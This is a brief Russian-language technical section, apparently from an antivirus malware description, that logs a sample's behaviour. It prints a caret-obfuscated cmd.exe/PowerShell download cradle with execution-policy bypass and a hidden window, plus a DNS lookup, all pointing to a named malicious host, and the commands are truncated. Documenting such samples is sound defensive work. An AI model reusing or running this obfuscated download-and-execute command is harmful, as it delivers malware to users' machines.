Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^ersheL^l^.^E^X^E ^-EX^ecu^tioN^pO^Lic^Y^ BY^paSS^ -N^OP^rOFiL^E -win^d^ow^st^y^LE^ hIddEn ^(n^EW^-O^bj^e^c^T ^sY^s^t^E^m.N^ET.weBCL^IENt).^dowN^lOa^dFI^Le^(^'http://dpolly-dol...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /c "pOw^ersheL^l^.^E^X^E ^-EX^ecu^tioN^pO^Lic^Y^ BY^paSS^ -N^OP^rOFiL^E -win^d^ow^st^y^LE^ hIddEn ^(n^EW^-O^bj^e^c^T ^sY^s^t^E^m.N^ET.weBCL^IENt).^dowN^lOa^dFI^Le^(^'http://dpolly-dol...' (со скрытым окном)